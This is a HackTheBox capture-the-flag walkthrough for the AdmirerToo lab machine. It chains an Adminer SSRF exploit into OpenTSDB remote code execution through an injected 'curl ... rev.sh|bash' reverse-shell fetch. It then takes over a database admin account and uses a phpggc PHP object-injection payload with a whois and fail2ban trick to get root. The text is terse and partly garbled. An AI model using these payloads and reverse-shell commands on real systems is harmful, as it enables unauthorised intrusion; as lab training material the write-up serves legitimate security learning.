HackTheBox – AdmirerToo Walkthrough – In English
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap -A 10.10.11.137
But by observing the source code we can see the following mail webmaster@admirer-gallery.htb
:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# gobuster vhost -k -u http://admirer-gallery.htb -w subdomains-top1million-110000.txt -t 100 -o out
http://db.admirer-gallery.htb/
This is Adminer, Adminer is open-source database management in a single PHP file.
By observing the POST request of Enter
we can see the following HTTP POST request:
We get this
auth%5Bdriver%5D=server&auth%5Bserver%5D=localhost&auth%5Busername%5D=admirer_ro&auth%5Bpassword%5D=1w4nn4b3adm1r3d2%21&auth%5Bdb%5D=admirer&auth%5Bpermanent%5D=1
We can see the password 1w4nn4b3adm1r3d2%21
which is 1w4nn4b3adm1r3d2!
.
In Adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability, Users of Adminer versions bundling all drivers (e.g. adminer.php) are affected. This is fixed in version 4.7.9.
If we have SSRF we can try to access port 4242
:
https://github.com/llhala/CVE-2021-21311
┌──(root㉿kali)-[/home/kali/Downloads/CVE-2021-21311]
└─# nc -lvnp 80
┌──(root㉿kali)-[/home/kali/Downloads/CVE-2021-21311]
└─# python3 CVE-2021-21311.py –host 10.10.14.102 –url http://db.admirer-gallery.htb –redirect http://10.10.11.137:4242
As we can see from the response – this is OpenTSDB
.
According to https://security.snyk.io/vuln/SNYK-JAVA-NETOPENTSDB-1041751openTSDB
vulnrable to RCE
(CVE-2020-35476) by browsing to the following URL:
Let’s edit the script CVE-2021-21311.py and change the redirect URL to download our reverse shell and run it:
Modify the contentdef do_GET(self): self.send_response(301) self.send_header(‘Location’, “http://localhost:4242/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=[33:system(‘curl${IFS}http://10.10.14.102:8000/rev.sh|bash’)]&wxh=1516×644&style=linespoint&baba=lala&grid=t&json”) #self.redirect) self.end_headers()
┌──(root㉿kali)-[/home/kali/Downloads/CVE-2021-21311]
└─# python3 CVE-2021-21311.py –host 10.10.14.102 –url http://db.admirer-gallery.htb –redirect http://10.10.11.137:4242
opentsdb@admirertoo:/$ ls /home
opentsdb@admirertoo:/$ cd /var/www/adminer
opentsdb@admirertoo:/var/www/adminer$ cat plugins/data/servers.php
Let’s use the password bQ3u7^AxzcB7qAsxE3
for the user jennifer
:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ssh jennifer@10.10.11.137
jennifer@admirertoo:~$ cd /opt/opencats/
jennifer@admirertoo:/opt/opencats$ ls
jennifer@admirertoo:/opt/opencats$ cat config.php
jennifer@admirertoo:/opt/opencats$ mysql -u cats -padm1r3r0fc4ts -D cats_dev
MariaDB [cats_dev]> show tables;
MariaDB [cats_dev]> select user_name,password from user;
We are not able to crack those hashes using john
and rockyou.txt
but we can change the admin hash to our password test@123 which is ceb6c970658f31504a901b89dcd3e461
on MD5:
MariaDB [cats_dev]> update user set password=’ceb6c970658f31504a901b89dcd3e461′ where user_name=’admin’;
jennifer@admirertoo:/opt/opencats$ netstat –ant
Password: bQ3u7^AxzcB7qAsxE3
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ssh -N -L 8889:127.0.0.1:8080 jennifer@10.10.11.137
By browsing to http://localhost:8889 we get:
We can see that is OpenCATS Version 0.9.5.2
By logging in using our credentials admin:test@123
we get:
OpenCATS
is vulnerable to PHP Object injection, by leveraging this vulnerability, it is possible to conduct arbitrary file writing and execute arbitrary code on a system.
Following this OpenCATS PHP Object Injection to Arbitrary File Write we can see that we can write a file but we have no permissions to write file to openCATS
directory.
We need to chain another exploit.
By enumerating again we can see that we have fail2ban installed:
jennifer@admirertoo:/opt/opencats$ cd vendor/
jennifer@admirertoo:/opt/opencats/vendor$ cat /etc/fail2ban/jail.local
So first let’s create a file called payload
:}]|. [10.10.14.102]https://snoopysecurity.github.io/web-application-security/2021/01/16/09_opencats_php_object_injection.html we can write file with the following created payload: ┌──(root㉿kali)-[/home/kali/Downloads/phpggc] └─# ./phpggc -u –fast-destruct Guzzle/FW1 /usr/local/etc/whois.conf /home/kali/Downloads/payload
Now try to access this URL:
http://localhost:8889/index.php?m=activity¶metersactivity%3AActivityDataGrid=a%3A2%3A%7Bi%3A7%3BO%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A4%3A%7Bs%3A36%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00cookies%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A27%3A%22GuzzleHttp%5CCookie%5CSetCookie%22%3A1%3A%7Bs%3A33%3A%22%00GuzzleHttp%5CCookie%5CSetCookie%00data%22%3Ba%3A3%3A%7Bs%3A7%3A%22Expires%22%3Bi%3A1%3Bs%3A7%3A%22Discard%22%3Bb%3A0%3Bs%3A5%3A%22Value%22%3Bs%3A20%3A%22%7D%5D%7C.+%5B10.10.14.102%5D%0A%22%3B%7D%7D%7Ds%3A39%3A%22%00GuzzleHttp%5CCookie%5CCookieJar%00strictMode%22%3BN%3Bs%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A25%3A%22%2Fusr%2Flocal%2Fetc%2Fwhois.conf%22%3Bs%3A52%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00storeSessionCookies%22%3Bb%3A1%3B%7Di%3A7%3Bi%3A7%3B%7D
And by sending it we can see the file whois.conf
(whois.conf – alternative WHOIS servers list for whois client):
jennifer@admirertoo:/opt/opencats/vendor$ ls -ltr /usr/local/etc/
jennifer@admirertoo:/opt/opencats/vendor$ cat /usr/local/etc/whois.conf
┌──(root㉿kali)-[/home/kali/Downloads/phpggc]
└─# ncat -nvlkp 43 -c “cat revshell”
Now let’s run whois
on the target machine and we can see it’s fetch the payload from our machine:
jennifer@admirertoo:/tmp$ whois 10.10.14.102
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nc -nlvp 4444
Now let’s try to connect using SSH and insert the wrong password to make fail2ban
work:
root@admirertoo:/# cat /root/root.txt